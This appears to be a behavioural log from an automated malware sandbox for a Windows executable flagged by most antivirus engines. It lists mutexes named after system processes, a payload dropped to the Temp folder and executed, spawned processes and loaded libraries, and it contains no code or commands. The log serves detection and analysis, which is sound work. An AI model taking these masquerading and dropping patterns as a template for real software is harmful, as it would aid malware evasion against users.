        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_640_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3296_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1124_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1584_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_2936_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1172_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6444_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2300_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_7032_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6432_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6880_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_784_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4472_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4852_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_592_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\memory compressionM_1568_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5820_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6052_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\officeclicktorun.exeM_2648_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5072_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1452_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\#u6587#u4ef6#u7279#u5f81#u6458#u8981#u5217#u8868#u751f#u6210.exeM_7248_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2608_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2432_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1248_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_7296_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\cscript.exeM_5220_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5964_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5976_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\dashost.exeM_4228_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\conhost.exeM_5504_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_880_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3032_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_2716_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile created: C:\Users\user\AppData\Local\Temp\YMZwp.exeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeFile read: C:\Windows\system.iniJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: svchost.exe, 00000019.00000000.1454353956.000001F0FBA9F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [WNSPushChannel]( [ChannelId] TEXT NOT NULL, [HandlerId] INTEGER REFERENCES[NotificationHandler]([RecordId]) ON DELETE CASCADE ON UPDATE CASCADE, [Uri] TEXT, [ExpiryTime] INT64, [CreatedTime] INT64, [DeviceVersion] INT64 DEFAULT '0', CONSTRAINT[] PRIMARY KEY([ChannelId]) ON CONFLICT REPLACE);
        Source: svchost.exe, 00000017.00000000.1451423059.000001697C109000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SELECT [Id], [AssetPayload], [Status], [LastRefreshTime] FROM [Asset] WHERE [Status]=?;
        Source: svchost.exe, 00000017.00000000.1451662239.000001697C19A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1450773187.000001697A665000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1451423059.000001697C12C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: INSERT INTO [Activity] ([Id], [AppId], [PackageIdHash], [AppActivityId], [ActivityType], [ActivityStatus], [ParentActivityId], [Tag], [Group], [MatchId], [LastModifiedTime], [ExpirationTime], [Payload], [Priority], [IsLocalOnly], [PlatformDeviceId], [CreatedInCloud], [StartTime], [EndTime], [LastModifiedOnClient], [GroupAppActivityId], [ClipboardPayload], [EnterpriseId], [UserActionState], [IsRead], [GroupItems], [DdsDeviceId], [LocalExpirationTime], [ETag]) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,(SELECT [Value] FROM [ManualSequence] WHERE [Key] = 'Activity'));
        Source: svchost.exe, 00000017.00000000.1451423059.000001697C12C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: INSERT INTO [Activity] ([Id], [AppId], [PackageIdHash], [AppActivityId], [ActivityType], [ActivityStatus], [ParentActivityId], [Tag], [Group], [MatchId], [LastModifiedTime], [ExpirationTime], [Payload], [Priority], [IsLocalOnly], [PlatformDeviceId], [CreatedInCloud], [StartTime], [EndTime], [LastModifiedOnClient], [GroupAppActivityId], [ClipboardPayload], [EnterpriseId], [UserActionState], [IsRead], [GroupItems], [DdsDeviceId], [LocalExpirationTime], [ETag]) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,(SELECT [Value] FROM [ManualSequence] WHERE [Key] = 'Activity'));Acrobat","acti
        Source: svchost.exe, 00000017.00000000.1451662239.000001697C19A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: INSERT INTO [Activity_PackageId] ([ActivityId], [Platform], [PackageName], [ExpirationTime]) VALUES (?,?,?,?);
        Source: svchost.exe, 00000017.00000000.1451423059.000001697C109000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SELECT [Id], [AssetPayload], [Status], [LastRefreshTime] FROM [Asset] WHERE [Status]=?;=
        Source: svchost.exe, 00000017.00000000.1451423059.000001697C112000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: UPDATE [ManualSequence] SET [Value] = [Value] + 1 WHERE [Key] = 'Activity';
        Source: svchost.exe, 00000017.00000000.1451662239.000001697C19A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: INSERT INTO [Activity_PackageId] ([ActivityId], [Platform], [PackageName], [ExpirationTime]) VALUES (?,?,?,?);p
        Source: svchost.exe, 00000017.00000000.1451423059.000001697C12C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: CREATE TABLE [Activity_PackageId]([ActivityId] GUID NOT NULL, [Platform] TEXT NOT NULL COLLATE NOCASE, [PackageName] TEXT NOT NULL COLLATE NOCASE, [ExpirationTime] DATETIME NOT NULL);
        Source: svchost.exe, 00000017.00000000.1450773187.000001697A665000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: INSERT INTO [Activity] ([Id], [AppId], [PackageIdHash], [AppActivityId], [ActivityType], [ActivityStatus], [ParentActivityId], [Tag], [Group], [MatchId], [LastModifiedTime], [ExpirationTime], [Payload], [Priority], [IsLocalOnly], [PlatformDeviceId], [CreatedInCloud], [StartTime], [EndTime], [LastModifiedOnClient], [GroupAppActivityId], [ClipboardPayload], [EnterpriseId], [UserActionState], [IsRead], [GroupItems], [DdsDeviceId], [LocalExpirationTime], [ETag]) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,(SELECT [Value] FROM [ManualSequence] WHERE [Key] = 'Activity'));oLYkzl/RcxGsR4
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeReversingLabs: Detection: 97%
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeVirustotal: Detection: 89%
        Source: unknownProcess created: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe "C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe"
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess created: C:\Users\user\AppData\Local\Temp\YMZwp.exe C:\Users\user\AppData\Local\Temp\YMZwp.exe
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess created: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess created: C:\Windows\System32\RuntimeBroker.exe C:\Windows\System32\RuntimeBroker.exe -Embedding
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 1624
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess created: C:\Users\user\AppData\Local\Temp\YMZwp.exe C:\Users\user\AppData\Local\Temp\YMZwp.exeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: dataexchange.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: dcomp.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: ntvdm64.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: esent.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dxgi.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: wincorlib.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.xaml.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: coremessaging.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: iertutil.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dcomp.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: wintypes.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.staterepositorycore.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windowmanagementapi.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: textinputframework.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: inputhost.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: propsys.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: ntmarta.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: urlmon.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: srvcli.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: netutils.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: d3d11.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: quickactionsdatamodel.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: d3d10warp.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dxcore.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: d2d1.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: mrmcorer.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.storage.applicationdata.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.staterepositoryclient.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: wldp.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dwrite.dll
